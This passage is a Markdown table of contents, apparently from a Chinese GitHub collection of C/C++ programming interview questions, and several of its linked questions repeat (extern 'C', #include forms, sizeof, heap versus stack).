什么是“引用”?申明和使用“引用”要注意哪些问题?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#580%E4%BB%80%E4%B9%88%E6%98%AF%E5%BC%95%E7%94%A8%E7%94%B3%E6%98%8E%E5%92%8C%E4%BD%BF%E7%94%A8%E5%BC%95%E7%94%A8%E8%A6%81%E6%B3%A8%E6%84%8F%E5%93%AA%E4%BA%9B%E9%97%AE%E9%A2%98) ##### [16.3.9 
触发器怎么工作的?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#581%E8%A7%A6%E5%8F%91%E5%99%A8%E6%80%8E%E4%B9%88%E5%B7%A5%E4%BD%9C%E7%9A%84) ##### [16.4.1 C也可以通过精心封装某些函数功能实现重用,那C++的类有什么优点吗,难道仅仅是为实现重用。](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#582c%E4%B9%9F%E5%8F%AF%E4%BB%A5%E9%80%9A%E8%BF%87%E7%B2%BE%E5%BF%83%E5%B0%81%E8%A3%85%E6%9F%90%E4%BA%9B%E5%87%BD%E6%95%B0%E5%8A%9F%E8%83%BD%E5%AE%9E%E7%8E%B0%E9%87%8D%E7%94%A8%E9%82%A3c%E7%9A%84%E7%B1%BB%E6%9C%89%E4%BB%80%E4%B9%88%E4%BC%98%E7%82%B9%E5%90%97%E9%9A%BE%E9%81%93%E4%BB%85%E4%BB%85%E6%98%AF%E4%B8%BA%E5%AE%9E%E7%8E%B0%E9%87%8D%E7%94%A8) ##### [16.4.2 CSingleLock是干什么的。](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#583csinglelock%E6%98%AF%E5%B9%B2%E4%BB%80%E4%B9%88%E7%9A%84) ##### [16.4.3 C++中引用和指针的区别?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#584c%E4%B8%AD%E5%BC%95%E7%94%A8%E5%92%8C%E6%8C%87%E9%92%88%E7%9A%84%E5%8C%BA%E5%88%AB) ##### [16.4.4 C与C++各自是如何定义常量的?有什么不同?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#585c%E4%B8%8Ec%E5%90%84%E8%87%AA%E6%98%AF%E5%A6%82%E4%BD%95%E5%AE%9A%E4%B9%89%E5%B8%B8%E9%87%8F%E7%9A%84%E6%9C%89%E4%BB%80%E4%B9%88%E4%B8%8D%E5%90%8C) ##### [16.4.5 C++函数中值的传递方式有哪几种?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#586c%E5%87%BD%E6%95%B0%E4%B8%AD%E5%80%BC%E7%9A%84%E4%BC%A0%E9%80%92%E6%96%B9%E5%BC%8F%E6%9C%89%E5%93%AA%E5%87%A0%E7%A7%8D) ##### [16.4.6 一般数据库若出现日志满了,会出现什么情况,是否还能使用?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#587%E4%B8%80%E8%88%AC%E6%95%B0%E6%8D%AE%E5%BA%93%E8%8B%A5%E5%87%BA%E7%8E%B0%E6%97%A5%E5%BF%97%E6%BB%A1%E4%BA%86%E4%BC%9A%E5%87%BA%E7%8E%B0%E4%BB%80%E4%B9%88%E6%83%85%E5%86%B5%E6%98%AF%E5%90%A6%E8%BF%98%E8%83%BD%E4%BD%BF%E7%94%A8) ##### [16.4.7 C++里面如何声明constvoidf(void)函数为C程序中的库函数?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#588c%E9%87%8C%E9%9D%A2%E5%A6%82%E4%BD%95%E5%A3%B0%E6%98%8Econstvoidfvoid%E5%87%BD%E6%95%B0%E4%B8%BAc%E7%A8%8B%E5%BA%8F%E4%B8%AD%E7%9A%84%E5%BA%93%E5%87%BD%E6%95%B0) ##### [16.4.8 c++中类和c语言中struct的区别(至少两点)](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#589c%E4%B8%AD%E7%B1%BB%E5%92%8Cc%E8%AF%AD%E8%A8%80%E4%B8%ADstruct%E7%9A%84%E5%8C%BA%E5%88%AB%E8%87%B3%E5%B0%91%E4%B8%A4%E7%82%B9) ##### [16.4.9 IP组播有那些好处?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#590ip%E7%BB%84%E6%92%AD%E6%9C%89%E9%82%A3%E4%BA%9B%E5%A5%BD%E5%A4%84) ##### [16.5.1 变量的声明和定义有什么区别?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#591%E5%8F%98%E9%87%8F%E7%9A%84%E5%A3%B0%E6%98%8E%E5%92%8C%E5%AE%9A%E4%B9%89%E6%9C%89%E4%BB%80%E4%B9%88%E5%8C%BA%E5%88%AB) ##### [16.5.2 程序什么时候应该使用线程,什么时候单线程效率高。](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#592%E7%A8%8B%E5%BA%8F%E4%BB%80%E4%B9%88%E6%97%B6%E5%80%99%E5%BA%94%E8%AF%A5%E4%BD%BF%E7%94%A8%E7%BA%BF%E7%A8%8B%E4%BB%80%E4%B9%88%E6%97%B6%E5%80%99%E5%8D%95%E7%BA%BF%E7%A8%8B%E6%95%88%E7%8E%87%E9%AB%98) ##### [16.5.3 介绍一下模板和容器。如何实现?(也许会让你当场举例实现)](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#593%E4%BB%8B%E7%BB%8D%E4%B8%80%E4%B8%8B%E6%A8%A1%E6%9D%BF%E5%92%8C%E5%AE%B9%E5%99%A8%E5%A6%82%E4%BD%95%E5%AE%9E%E7%8E%B0%E4%B9%9F%E8%AE%B8%E4%BC%9A%E8%AE%A9%E4%BD%A0%E5%BD%93%E5%9C%BA%E4%B8%BE%E4%BE%8B%E5%AE%9E%E7%8E%B0) ##### [16.5.4 
以下为WindowsNT下的32位C++程序,请计算sizeof的值](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#594%E4%BB%A5%E4%B8%8B%E4%B8%BAwindowsnt%E4%B8%8B%E7%9A%8432%E4%BD%8Dc%E7%A8%8B%E5%BA%8F%E8%AF%B7%E8%AE%A1%E7%AE%97sizeof%E7%9A%84%E5%80%BC) ##### [16.5.5 C语言同意一些令人震惊的结构,下面的结构是合法的吗,如果是它做些什么?inta=5,b=7,c;c=a+++b;](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#595c%E8%AF%AD%E8%A8%80%E5%90%8C%E6%84%8F%E4%B8%80%E4%BA%9B%E4%BB%A4%E4%BA%BA%E9%9C%87%E6%83%8A%E7%9A%84%E7%BB%93%E6%9E%84%E4%B8%8B%E9%9D%A2%E7%9A%84%E7%BB%93%E6%9E%84%E6%98%AF%E5%90%88%E6%B3%95%E7%9A%84%E5%90%97%E5%A6%82%E6%9E%9C%E6%98%AF%E5%AE%83%E5%81%9A%E4%BA%9B%E4%BB%80%E4%B9%88inta5b7ccab) ##### [16.5.6 #include与#include“file.h”的区别?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#596include%E4%B8%8Eincludefileh%E7%9A%84%E5%8C%BA%E5%88%AB) ##### [16.5.7 如何在C中初始化一个字符数组。](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#597%E5%A6%82%E4%BD%95%E5%9C%A8c%E4%B8%AD%E5%88%9D%E5%A7%8B%E5%8C%96%E4%B8%80%E4%B8%AA%E5%AD%97%E7%AC%A6%E6%95%B0%E7%BB%84) ##### [16.5.8 在C++程序中调用被C编译器编译后的函数,为什么要加extern“C”?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#598%E5%9C%A8c%E7%A8%8B%E5%BA%8F%E4%B8%AD%E8%B0%83%E7%94%A8%E8%A2%ABc%E7%BC%96%E8%AF%91%E5%99%A8%E7%BC%96%E8%AF%91%E5%90%8E%E7%9A%84%E5%87%BD%E6%95%B0%E4%B8%BA%E4%BB%80%E4%B9%88%E8%A6%81%E5%8A%A0externc) ##### [16.5.9 内存的分配方式的分配方式有几种?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#599%E5%86%85%E5%AD%98%E7%9A%84%E5%88%86%E9%85%8D%E6%96%B9%E5%BC%8F%E7%9A%84%E5%88%86%E9%85%8D%E6%96%B9%E5%BC%8F%E6%9C%89%E5%87%A0%E7%A7%8D) ##### [16.6.1 在C++程序中调用被C编译器编译后的函数,为什么要加extern"C"?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#600%E5%9C%A8c%E7%A8%8B%E5%BA%8F%E4%B8%AD%E8%B0%83%E7%94%A8%E8%A2%ABc%E7%BC%96%E8%AF%91%E5%99%A8%E7%BC%96%E8%AF%91%E5%90%8E%E7%9A%84%E5%87%BD%E6%95%B0%E4%B8%BA%E4%BB%80%E4%B9%88%E8%A6%81%E5%8A%A0externc) ##### [16.6.2 如何让局部变量具有全局生命期。](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#601%E5%A6%82%E4%BD%95%E8%AE%A9%E5%B1%80%E9%83%A8%E5%8F%98%E9%87%8F%E5%85%B7%E6%9C%89%E5%85%A8%E5%B1%80%E7%94%9F%E5%91%BD%E6%9C%9F) ##### [16.6.3 解释堆和栈的区别。](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#602%E8%A7%A3%E9%87%8A%E5%A0%86%E5%92%8C%E6%A0%88%E7%9A%84%E5%8C%BA%E5%88%AB) ##### [16.6.4 在C++程序中调用被C编译器编译后的函数,为什么要加extern“C”声明?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#603%E5%9C%A8c%E7%A8%8B%E5%BA%8F%E4%B8%AD%E8%B0%83%E7%94%A8%E8%A2%ABc%E7%BC%96%E8%AF%91%E5%99%A8%E7%BC%96%E8%AF%91%E5%90%8E%E7%9A%84%E5%87%BD%E6%95%B0%E4%B8%BA%E4%BB%80%E4%B9%88%E8%A6%81%E5%8A%A0externc%E5%A3%B0%E6%98%8E) ##### [16.6.5 strtok函数在使用上要注意什么问题。](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#604strtok%E5%87%BD%E6%95%B0%E5%9C%A8%E4%BD%BF%E7%94%A8%E4%B8%8A%E8%A6%81%E6%B3%A8%E6%84%8F%E4%BB%80%E4%B9%88%E9%97%AE%E9%A2%98) ##### [16.6.6 用预处理指令#define声明一个常数,用以表明1年中有多少秒(忽略闰年问题)](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#605%E7%94%A8%E9%A2%84%E5%A4%84%E7%90%86%E6%8C%87%E4%BB%A4define%E5%A3%B0%E6%98%8E%E4%B8%80%E4%B8%AA%E5%B8%B8%E6%95%B0%E7%94%A8%E4%BB%A5%E8%A1%A8%E6%98%8E1%E5%B9%B4%E4%B8%AD%E6%9C%89%E5%A4%9A%E5%B0%91%E7%A7%92%E5%BF%BD%E7%95%A5%E9%97%B0%E5%B9%B4%E9%97%AE%E9%A2%98) ##### [16.6.7 
说一说C与C++的内存分配方式?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#606%E8%AF%B4%E4%B8%80%E8%AF%B4c%E4%B8%8Ec%E7%9A%84%E5%86%85%E5%AD%98%E5%88%86%E9%85%8D%E6%96%B9%E5%BC%8F) ##### [16.6.8 你如何理解MVC。简单举例来说明其应用。](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#607%E4%BD%A0%E5%A6%82%E4%BD%95%E7%90%86%E8%A7%A3mvc%E7%AE%80%E5%8D%95%E4%B8%BE%E4%BE%8B%E6%9D%A5%E8%AF%B4%E6%98%8E%E5%85%B6%E5%BA%94%E7%94%A8) ##### [16.6.9 在C++程序中调用被C编译器编译后的函数,为什么要加extern“C”声明?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#608%E5%9C%A8c%E7%A8%8B%E5%BA%8F%E4%B8%AD%E8%B0%83%E7%94%A8%E8%A2%ABc%E7%BC%96%E8%AF%91%E5%99%A8%E7%BC%96%E8%AF%91%E5%90%8E%E7%9A%84%E5%87%BD%E6%95%B0%E4%B8%BA%E4%BB%80%E4%B9%88%E8%A6%81%E5%8A%A0externc%E5%A3%B0%E6%98%8E) ##### [16.7.1 inti=(j=4,k=8,l=16,m=32);printf(“%d”,i);输出是多少?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#609intij4k8l16m32printfdi%E8%BE%93%E5%87%BA%E6%98%AF%E5%A4%9A%E5%B0%91) ##### [16.7.2 #include与#include“file.h”的区别?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#610include%E4%B8%8Eincludefileh%E7%9A%84%E5%8C%BA%E5%88%AB) ##### [16.7.3 既然C++中有更好的const为什么还要使用宏?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#611%E6%97%A2%E7%84%B6c%E4%B8%AD%E6%9C%89%E6%9B%B4%E5%A5%BD%E7%9A%84const%E4%B8%BA%E4%BB%80%E4%B9%88%E8%BF%98%E8%A6%81%E4%BD%BF%E7%94%A8%E5%AE%8F) ##### [16.7.4 重载(overload)和重写(overried,有的书也叫做“覆盖”)的区别?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#612%E9%87%8D%E8%BD%BDoverload%E5%92%8C%E9%87%8D%E5%86%99overried%E6%9C%89%E7%9A%84%E4%B9%A6%E4%B9%9F%E5%8F%AB%E5%81%9A%E8%A6%86%E7%9B%96%E7%9A%84%E5%8C%BA%E5%88%AB) ##### [16.7.5 C++和C定义结构的分别是什么。](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#613c%E5%92%8Cc%E5%AE%9A%E4%B9%89%E7%BB%93%E6%9E%84%E7%9A%84%E5%88%86%E5%88%AB%E6%98%AF%E4%BB%80%E4%B9%88) ##### [16.7.6 #include和#include"a.h"有什么区别?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#614include%E5%92%8Cincludeah%E6%9C%89%E4%BB%80%E4%B9%88%E5%8C%BA%E5%88%AB) ##### [16.7.7 #include和#include“filename.h”有什么区别?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#615include%E5%92%8Cincludefilenameh%E6%9C%89%E4%BB%80%E4%B9%88%E5%8C%BA%E5%88%AB) ##### [16.7.8 C函数可否单独编译?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#616c%E5%87%BD%E6%95%B0%E5%8F%AF%E5%90%A6%E5%8D%95%E7%8B%AC%E7%BC%96%E8%AF%91) ##### [16.7.9 请简述以下两个for循环的优缺点](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#617%E8%AF%B7%E7%AE%80%E8%BF%B0%E4%BB%A5%E4%B8%8B%E4%B8%A4%E4%B8%AAfor%E5%BE%AA%E7%8E%AF%E7%9A%84%E4%BC%98%E7%BC%BA%E7%82%B9) ##### [16.8.1 完成程序,实现对数组的降序排序](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#618%E5%AE%8C%E6%88%90%E7%A8%8B%E5%BA%8F%E5%AE%9E%E7%8E%B0%E5%AF%B9%E6%95%B0%E7%BB%84%E7%9A%84%E9%99%8D%E5%BA%8F%E6%8E%92%E5%BA%8F) ##### [16.8.2 delete[]arry和deletearry一样吗?不一样请说明;](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#619deletearry%E5%92%8Cdeletearry%E4%B8%80%E6%A0%B7%E5%90%97%E4%B8%8D%E4%B8%80%E6%A0%B7%E8%AF%B7%E8%AF%B4%E6%98%8E) ##### [16.8.3 
结合1个你认为比较能体现OOP思想的项目,用UML来描述。](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#620%E7%BB%93%E5%90%881%E4%B8%AA%E4%BD%A0%E8%AE%A4%E4%B8%BA%E6%AF%94%E8%BE%83%E8%83%BD%E4%BD%93%E7%8E%B0oop%E6%80%9D%E6%83%B3%E7%9A%84%E9%A1%B9%E7%9B%AE%E7%94%A8uml%E6%9D%A5%E6%8F%8F%E8%BF%B0) ##### [16.8.4 C与C++各自是如何定义常量的?有什么不同?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#621c%E4%B8%8Ec%E5%90%84%E8%87%AA%E6%98%AF%E5%A6%82%E4%BD%95%E5%AE%9A%E4%B9%89%E5%B8%B8%E9%87%8F%E7%9A%84%E6%9C%89%E4%BB%80%E4%B9%88%E4%B8%8D%E5%90%8C) ##### [16.8.5 头文件中的ifndef/define/endif干什么用?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#622%E5%A4%B4%E6%96%87%E4%BB%B6%E4%B8%AD%E7%9A%84ifndefdefineendif%E5%B9%B2%E4%BB%80%E4%B9%88%E7%94%A8) ##### [16.8.6 C++中为什么用模板类。](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#623c%E4%B8%AD%E4%B8%BA%E4%BB%80%E4%B9%88%E7%94%A8%E6%A8%A1%E6%9D%BF%E7%B1%BB) ##### [16.8.7 动态连接库的两种方式?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#624%E5%8A%A8%E6%80%81%E8%BF%9E%E6%8E%A5%E5%BA%93%E7%9A%84%E4%B8%A4%E7%A7%8D%E6%96%B9%E5%BC%8F) ##### [16.8.8 在什么时候需要使用“常引用”?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#625%E5%9C%A8%E4%BB%80%E4%B9%88%E6%97%B6%E5%80%99%E9%9C%80%E8%A6%81%E4%BD%BF%E7%94%A8%E5%B8%B8%E5%BC%95%E7%94%A8) ##### [16.8.9 预处理器标识#error的目的是什么?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#626%E9%A2%84%E5%A4%84%E7%90%86%E5%99%A8%E6%A0%87%E8%AF%86error%E7%9A%84%E7%9B%AE%E7%9A%84%E6%98%AF%E4%BB%80%E4%B9%88) ##### [16.9.1 GCC3.2.2版本中支持哪几种编程语言。](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#627gcc322%E7%89%88%E6%9C%AC%E4%B8%AD%E6%94%AF%E6%8C%81%E5%93%AA%E5%87%A0%E7%A7%8D%E7%BC%96%E7%A8%8B%E8%AF%AD%E8%A8%80) ##### [16.9.2 已知strcpy的函数原型:charstrcpy(charstrDest,constchar*strSrc)其中strDest是目的字符串,strSrc是源字符串。不调用C++/C的字符串库函数,请编写函数strcpy。](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#628%E5%B7%B2%E7%9F%A5strcpy%E7%9A%84%E5%87%BD%E6%95%B0%E5%8E%9F%E5%9E%8Bcharstrcpycharstrdestconstcharstrsrc%E5%85%B6%E4%B8%ADstrdest%E6%98%AF%E7%9B%AE%E7%9A%84%E5%AD%97%E7%AC%A6%E4%B8%B2strsrc%E6%98%AF%E6%BA%90%E5%AD%97%E7%AC%A6%E4%B8%B2%E4%B8%8D%E8%B0%83%E7%94%A8cc%E7%9A%84%E5%AD%97%E7%AC%A6%E4%B8%B2%E5%BA%93%E5%87%BD%E6%95%B0%E8%AF%B7%E7%BC%96%E5%86%99%E5%87%BD%E6%95%B0strcpy) ##### [16.9.3 重载(overload)和重写(overried,有的书也叫做“覆盖”)的区别?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#629%E9%87%8D%E8%BD%BDoverload%E5%92%8C%E9%87%8D%E5%86%99overried%E6%9C%89%E7%9A%84%E4%B9%A6%E4%B9%9F%E5%8F%AB%E5%81%9A%E8%A6%86%E7%9B%96%E7%9A%84%E5%8C%BA%E5%88%AB) ##### [16.9.4 多重继承如何消除向上继承的二义性。](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#630%E5%A4%9A%E9%87%8D%E7%BB%A7%E6%89%BF%E5%A6%82%E4%BD%95%E6%B6%88%E9%99%A4%E5%90%91%E4%B8%8A%E7%BB%A7%E6%89%BF%E7%9A%84%E4%BA%8C%E4%B9%89%E6%80%A7) ##### [16.9.5 #include与#include“file.h”的区别?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#631include%E4%B8%8Eincludefileh%E7%9A%84%E5%8C%BA%E5%88%AB) ##### [16.9.6 
对数据库的一张表进行操作,同时要对另一张表进行操作,如何实现?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#632%E5%AF%B9%E6%95%B0%E6%8D%AE%E5%BA%93%E7%9A%84%E4%B8%80%E5%BC%A0%E8%A1%A8%E8%BF%9B%E8%A1%8C%E6%93%8D%E4%BD%9C%E5%90%8C%E6%97%B6%E8%A6%81%E5%AF%B9%E5%8F%A6%E4%B8%80%E5%BC%A0%E8%A1%A8%E8%BF%9B%E8%A1%8C%E6%93%8D%E4%BD%9C%E5%A6%82%E4%BD%95%E5%AE%9E%E7%8E%B0)
##### [16.9.7 #include<filename.h>和#include“filename.h”有什么区别?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#633includefilenameh%E5%92%8Cincludefilenameh%E6%9C%89%E4%BB%80%E4%B9%88%E5%8C%BA%E5%88%AB)
##### [16.9.8 预处理器标识#error的目的是什么?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#634%E9%A2%84%E5%A4%84%E7%90%86%E5%99%A8%E6%A0%87%E8%AF%86error%E7%9A%84%E7%9B%AE%E7%9A%84%E6%98%AF%E4%BB%80%E4%B9%88)
##### [16.9.9 头文件的作用是什么?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#635%E5%A4%B4%E6%96%87%E4%BB%B6%E7%9A%84%E4%BD%9C%E7%94%A8%E6%98%AF%E4%BB%80%E4%B9%88)
##### [17.1.1 请问运行Test函数会有什么样的结果?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#636%E8%AF%B7%E9%97%AE%E8%BF%90%E8%A1%8Ctest%E5%87%BD%E6%95%B0%E4%BC%9A%E6%9C%89%E4%BB%80%E4%B9%88%E6%A0%B7%E7%9A%84%E7%BB%93%E6%9E%9C)
##### [17.1.2 delete[]arry和deletearry一样吗?不一样请说明;](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#637deletearry%E5%92%8Cdeletearry%E4%B8%80%E6%A0%B7%E5%90%97%E4%B8%8D%E4%B8%80%E6%A0%B7%E8%AF%B7%E8%AF%B4%E6%98%8E)
##### [17.1.3 请问运行Test函数会有什么样的结果?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#638%E8%AF%B7%E9%97%AE%E8%BF%90%E8%A1%8Ctest%E5%87%BD%E6%95%B0%E4%BC%9A%E6%9C%89%E4%BB%80%E4%B9%88%E6%A0%B7%E7%9A%84%E7%BB%93%E6%9E%9C)
##### [17.1.4 请简述以下两个for循环的优缺点](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#639%E8%AF%B7%E7%AE%80%E8%BF%B0%E4%BB%A5%E4%B8%8B%E4%B8%A4%E4%B8%AAfor%E5%BE%AA%E7%8E%AF%E7%9A%84%E4%BC%98%E7%BC%BA%E7%82%B9)
##### [17.1.5 构造函数可否是虚函数,为什么?析构函数呢,可否是纯虚的呢?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#640%E6%9E%84%E9%80%A0%E5%87%BD%E6%95%B0%E5%8F%AF%E5%90%A6%E6%98%AF%E8%99%9A%E6%B1%97%E6%95%B0%E4%B8%BA%E4%BB%80%E4%B9%88%E6%9E%90%E6%9E%84%E5%87%BD%E6%95%B0%E5%91%A2%E5%8F%AF%E5%90%A6%E6%98%AF%E7%BA%AF%E8%99%9A%E7%9A%84%E5%91%A2)
##### [17.1.6 在C++程序中调用被C编译器编译后的函数,为什么要加extern"C"?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#641%E5%9C%A8c%E7%A8%8B%E5%BA%8F%E4%B8%AD%E8%B0%83%E7%94%A8%E8%A2%ABc%E7%BC%96%E8%AF%91%E5%99%A8%E7%BC%96%E8%AF%91%E5%90%8E%E7%9A%84%E5%87%BD%E6%95%B0%E4%B8%BA%E4%BB%80%E4%B9%88%E8%A6%81%E5%8A%A0externc)
##### [17.1.7 请写出下面代码在32位平台上的运行结果,并说明sizeof的性质:](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#642%E8%AF%B7%E5%86%99%E5%87%BA%E4%B8%8B%E9%9D%A2%E4%BB%A3%E7%A0%81%E5%9C%A832%E4%BD%8D%E5%B9%B3%E5%8F%B0%E4%B8%8A%E7%9A%84%E8%BF%90%E8%A1%8C%E7%BB%93%E6%9E%9C%E5%B9%B6%E8%AF%B4%E6%98%8Esizeof%E7%9A%84%E6%80%A7%E8%B4%A8)
##### [17.1.8 高级通信包括信号量,——-,——–](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#643%E9%AB%98%E7%BA%A7%E9%80%9A%E4%BF%A1%E5%8C%85%E6%8B%AC%E4%BF%A1%E5%8F%B7%E9%87%8F-)
##### [17.1.9 关联、聚合(Aggregation)以及组合(Composition)的区别?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#644%E5%85%B3%E8%81%94%E8%81%9A%E5%90%88aggregation%E4%BB%A5%E5%8F%8A%E7%BB%84%E5%90%88composition%E7%9A%84%E5%8C%BA%E5%88%AB)
##### [17.2.1 
尽管不像非嵌入式计算机那么常见,嵌入式系统还是有从堆(heap)中动态分配内存的过程的。那么嵌入式系统中,动态分配内存可能发生的问题是什么?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#645%E5%B0%BD%E7%AE%A1%E4%B8%8D%E5%83%8F%E9%9D%9E%E5%B5%8C%E5%85%A5%E5%BC%8F%E8%AE%A1%E7%AE%97%E6%9C%BA%E9%82%A3%E4%B9%88%E5%B8%B8%E8%A7%81%E5%B5%8C%E5%85%A5%E5%BC%8F%E7%B3%BB%E7%BB%9F%E8%BF%98%E6%98%AF%E6%9C%89%E4%BB%8E%E5%A0%86heap%E4%B8%AD%E5%8A%A8%E6%80%81%E5%88%86%E9%85%8D%E5%86%85%E5%AD%98%E7%9A%84%E8%BF%87%E7%A8%8B%E7%9A%84%E9%82%A3%E4%B9%88%E5%B5%8C%E5%85%A5%E5%BC%8F%E7%B3%BB%E7%BB%9F%E4%B8%AD%E5%8A%A8%E6%80%81%E5%88%86%E9%85%8D%E5%86%85%E5%AD%98%E5%8F%AF%E8%83%BD%E5%8F%91%E7%94%9F%E7%9A%84%E9%97%AE%E9%A2%98%E6%98%AF%E4%BB%80%E4%B9%88) ##### [17.2.2 请问运行Test函数会有什么样的结果?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#646%E8%AF%B7%E9%97%AE%E8%BF%90%E8%A1%8Ctest%E5%87%BD%E6%95%B0%E4%BC%9A%E6%9C%89%E4%BB%80%E4%B9%88%E6%A0%B7%E7%9A%84%E7%BB%93%E6%9E%9C) ##### [17.2.3 多态的实现](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#647%E5%A4%9A%E6%80%81%E7%9A%84%E5%AE%9E%E7%8E%B0) ##### [17.2.4 Cpp四种强制类型转换](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#648cpp%E5%9B%9B%E7%A7%8D%E5%BC%BA%E5%88%B6%E7%B1%BB%E5%9E%8B%E8%BD%AC%E6%8D%A2) ##### [17.2.5 类的static成员的特点](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#649%E7%B1%BB%E7%9A%84static%E6%88%90%E5%91%98%E7%9A%84%E7%89%B9%E7%82%B9) ##### [17.2.6 指针和引用的区别](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#650%E6%8C%87%E9%92%88%E5%92%8C%E5%BC%95%E7%94%A8%E7%9A%84%E5%8C%BA%E5%88%AB) ##### [17.2.7 谈谈对Cpp内存的理解](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#651%E8%B0%88%E8%B0%88%E5%AF%B9cpp%E5%86%85%E5%AD%98%E7%9A%84%E7%90%86%E8%A7%A3) ##### [17.2.8 谈谈new、delete、malloc、free](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#652%E8%B0%88%E8%B0%88newdeletemallocfree) ##### [17.2.9 const关键字](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#653const%E5%85%B3%E9%94%AE%E5%AD%97) ##### [17.3.1 知道STL吗,挑两个你最常用的容器说一说](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#654%E7%9F%A5%E9%81%93stl%E5%90%97%E6%8C%91%E4%B8%A4%E4%B8%AA%E4%BD%A0%E6%9C%80%E5%B8%B8%E7%94%A8%E7%9A%84%E5%AE%B9%E5%99%A8%E8%AF%B4%E4%B8%80%E8%AF%B4) ##### [17.3.2 怎么确定一个程序是C编译的还是C++编译的](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#655%E6%80%8E%E4%B9%88%E7%A1%AE%E5%AE%9A%E4%B8%80%E4%B8%AA%E7%A8%8B%E5%BA%8F%E6%98%AFc%E7%BC%96%E8%AF%91%E7%9A%84%E8%BF%98%E6%98%AFc%E7%BC%96%E8%AF%91%E7%9A%84) ##### [17.3.3 一个文件从源码到可执行文件所经历的过程](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#656%E4%B8%80%E4%B8%AA%E6%96%87%E4%BB%B6%E4%BB%8E%E6%BA%90%E7%A0%81%E5%88%B0%E5%8F%AF%E6%89%A7%E8%A1%8C%E6%96%87%E4%BB%B6%E6%89%80%E7%BB%8F%E5%8E%86%E7%9A%84%E8%BF%87%E7%A8%8B) ##### [17.3.4 了解C++新特性吗](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#657%E4%BA%86%E8%A7%A3c%E6%96%B0%E7%89%B9%E6%80%A7%E5%90%97) ##### [17.3.5 什么是纯虚函数](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#658%E4%BB%80%E4%B9%88%E6%98%AF%E7%BA%AF%E8%99%9A%E5%87%BD%E6%95%B0) ##### [17.3.6 
